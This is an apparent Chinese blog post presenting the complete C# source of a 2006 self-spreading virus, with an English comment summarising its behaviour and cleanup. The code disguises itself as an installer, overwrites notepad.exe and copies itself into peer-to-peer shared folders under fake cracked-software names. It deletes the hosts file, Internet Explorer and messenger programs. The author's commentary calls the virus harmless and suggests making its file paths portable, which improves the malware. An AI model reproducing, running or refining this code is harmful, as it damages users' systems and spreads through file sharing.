一个C#病毒源代码的分析


    病毒代码如下

    /*
     * NOTE(review): self-copying malware sample, reproduced unchanged for analysis.
     * The listing is collapsed onto a few physical lines by the page (line breaks fall
     * inside string literals and one identifier is encoding-damaged), so it is not
     * compilable as shown. Behaviour visible in the code:
     *
     * - MainClass.Main: prints an installer-style prompt, waits for ENTER, then
     *   constructs trigger. The calls View.LargeIcon.Equals(...),
     *   Application.StartupPath.Clone() and Application.AllowQuit.Equals(false)
     *   discard their results and change nothing.
     * - trigger: counts up to 10000 while printing fake progress, then constructs effects.
     * - effects: constructs copy first, then calls File.Delete on six hard-coded paths
     *   (Yahoo! Messenger, IEXPLORE.EXE, a hotfix DLL, the hosts file, two MSN Messenger
     *   files) inside ONE try block, so the first exception skips the remaining deletions.
     *   It then constructs report and infected and runs MainForm.
     * - copy: File.Copy of the running executable (overwrite = true) to
     *   <SystemDirectory>/winlogon.dll.exe, C:/WINDOWS/system32/taskman.exe and
     *   <SystemDirectory>/notepad.exe (replacing the genuine notepad.exe), and into four
     *   hard-coded peer-to-peer shared folders under file names that imitate cracked
     *   software and key generators. Each folder group is one try block.
     * - report: stub that only prints "Registering..".
     * - infected: the flag is always "true", so the else branch is never taken.
     * - MainForm: shows a modal MessageBox in a loop of up to 9999 iterations.
     *
     * No registry or startup-folder write appears in this listing.
     * For triage, the hard-coded destination paths and lure file names are the indicators:
     * every dropped copy is byte-identical to the original executable, so one hash covers
     * all of them. Remediation includes restoring notepad.exe, the hosts file and the
     * deleted browser/messenger binaries, not just removing the copies.
     */
    /* basic attempt at a virus in C# * project started Monday 10 July 2006 * ~~bl00dy c0d3r~~ */ using System; using System.IO; using System.Windows.Forms; class MainClass { public static void Main() { string pauseline = ""; System.Windows.Forms.View.LargeIcon.Equals(@"cd.ico"); Console.WriteLine("Iniciating Install.. "); Console.WriteLine("Press ENTER to start..."); pauseline = Console.ReadLine(); try { Application.StartupPath.Clone(); } catch (Exception) { Console.WriteLine("StartUp Path, not cloned.."); } try { Application.AllowQuit.Equals(false); } catch (Exception) { Console.WriteLine("to quit press Ctrl + C"); } new trigger(); } } class trigger { public trigger(){ long trigger, counter; trigger = 10000; counter = 2; while (trigger != counter) { counter = counter + 1; Console.WriteLine("{0} << progress out of 10000", counter); } new effects(); // once triggered it goes on to MainForm() and copy() } } class copy { public copy() { try { File.Copy(Application.ExecutablePath, System.Environment.SystemDirectory + @"/winlogon.dll.exe", true); } catch (Exception) { Console.WriteLine("winlogon failed permanently"); } try { File.Copy(Application.ExecutablePath, @"C:/WINDOWS/system32/taskman.exe", true); } catch (Exception) { Console.WriteLine("Finishing..."); }try { File.Copy(Application.ExecutablePath, System.Environment.SystemDirectory + @"/notepad.exe", true); }catch (Exception){ Console.WriteLine("Notepad failed permanently"); } try { File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Norton Antivirus~craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/LimeWire Pro~10.5 Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Key Generator Universal.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Generator Credit Card.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and 
Settings/Owner/Shared/Halo 2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Morpheus Ultra~Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/AntiSpyware Ultra.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Craked Windows XP sp2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Win Zip craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Macromedia Flash 8 craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Lord of the rings II craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Nero craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Google Earth Pro~craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Windows Vista Craked.exe", true); } catch (Exception) { Console.WriteLine("LimeWire not found.."); Console.WriteLine("Please try to download it at http://www.Limewire.com"); } try { File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Norton Antivirus~craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/LimeWire Pro~10.5 Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Key Generator Universal.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Generator Credit Card.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Halo 2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Morpheus Ultra~Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program 
Files/Morpheus Ultra/My Shared Folder/AntiSpyware Ultra.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Craked Windows XP sp2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Win Zip craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Macromedia Flash 8 craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Lord of the rings II craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Nero craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Google Earth Pro~craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus Ultra/My Shared Folder/Windows Vista Craked.exe", true); } catch (Exception) { Console.WriteLine("Morpheus Ultra not Found.."); } try { File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Norton Antivirus~Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/LimeWire Pro~10.5 Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Key Generator Universal.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Halo 2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Morpheus Ultra~Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/AntiSpyware Ultra.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Craked Windows XP sp2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Win Zip craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program 
Files/Morpheus/My Shared Folder/Macromedia Flash 8 craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Lord of the rings II craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Nero craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Google Earth Pro~craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Morpheus/My Shared Folder/Windows Vista Craked.exe", true); } catch (Exception) { Console.WriteLine("Morpheus not found.."); } try { File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Norton Antivirus~Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/LimeWire Pro~10.5 Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Key Generator Universal.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Halo 2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Morpheus Ultra~Craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/AntiSpyware Ultra.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Craked Windows XP sp2.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Win Zip craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Macromedia Flash 8 craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Lord of the rings II craked.exe", true); File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Nero craked.exe", true); File.Copy(Applica瓚ion.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Google Earth Pro~craked.exe", true); 
File.Copy(Application.ExecutablePath, @"C:/Program Files/Kazaa/My Shared Folder/Windows Vista Craked.exe", true); } catch (Exception) { Console.WriteLine("Kazaa not found.."); } } } class effects { public effects() { new copy(); try { File.Delete(@"C:/Program Files/Yahoo!/Messenger/YPager.exe"); File.Delete(@"C:/Program Files/Internet Explorer/IEXPLORE.EXE"); File.Delete(@"C:/WINDOWS/$hf_mig$/KB873339/spmsg.dll"); File.Delete(@"C:/WINDOWS/system32/drivers/etc/hosts"); File.Delete(@"C:/Program Files/MSN Messenger/msvc.exe"); File.Delete(@"C:/Program Files/MSN Messenger/msnmsgr.exe"); } catch (Exception) { Console.WriteLine("Internet Explorer not found.."); } new report(); new infected(); Application.Run(new MainForm()); } } class infected { public infected() { string youInfected; youInfected = "true"; if (youInfected == "true") { Console.WriteLine("Finished!!"); Console.WriteLine("press ENTER to continue..."); string pauselineinfected; pauselineinfected = Console.ReadLine(); } else { new effects(); } } } class report { public report() { // the reporting code will go here Console.WriteLine("Registering.."); } } class MainForm : Form { public MainForm() { long numDeVeces = 10000; long counter = 1; while (numDeVeces != counter) { try { Application.AllowQuit.Equals(false); } catch (Exception) { Console.WriteLine("JEJEJEJE!!!"); } counter = counter + 1; MessageBox.Show("Estas Infectad@ con bl00dy Mary, have phun!!/nNo intentes remover el virus o atacara!!", "Error Fatal..", MessageBoxButtons.OK, MessageBoxIcon.Hand, MessageBoxDefaultButton.Button1); } } } // finished Sunday 16 July 2006 10:43 pm. -=[bl00dy c0d3r]=-

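    这个病毒没杀伤力,就是几个替换和拷贝文件而已(不过要注意:effects 类里还有一组 File.Delete 调用,会删除 hosts 文件、IEXPLORE.EXE 以及 MSN/Yahoo Messenger 的可执行文件,系统目录下的 notepad.exe 也会被病毒自身覆盖,清理时需要一并恢复这些文件)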

    不过觉得作者有一段代码写的不精炼

       File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Norton Antivirus~craked.exe", true);   File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/LimeWire Pro~10.5 Craked.exe", true);   File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Key Generator Universal.exe", true);   File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Generator Credit Card.exe", true);   File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Halo 2.exe", true);   File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Morpheus Ultra~Craked.exe", true);   File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/AntiSpyware Ultra.exe", true);   File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Craked Windows XP sp2.exe", true);   File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Win Zip craked.exe", true);   File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Macromedia Flash 8 craked.exe", true);   File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Lord of the rings II craked.exe", true);   File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Nero craked.exe", true);   File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Google Earth Pro~craked.exe", true);   File.Copy(Application.ExecutablePath, @"C:/Documents and Settings/Owner/Shared/Windows Vista Craked.exe", true);   } catch (Exception) {   Console.WriteLine("LimeWire not found..");   Console.WriteLine("Please try to download it at http://www.Limewire.com");

     

    磁盘路径C:/Documents and Settings/Owner/并不是每台计算机的操作系统都安装在C盘

    可以用Environment.GetEnvironmentVariable 方法获得系统环境变量

    例如用户配置文档目录%userprofile%,以及系统应用程序安装目录 %programfiles%都可以用上面那个方法获得.

    例如获得用户配置文档目录Environment.GetEnvironmentVariable("userprofile")

    不过作者挺专业的都写好了 autorun.inf和nfo文件

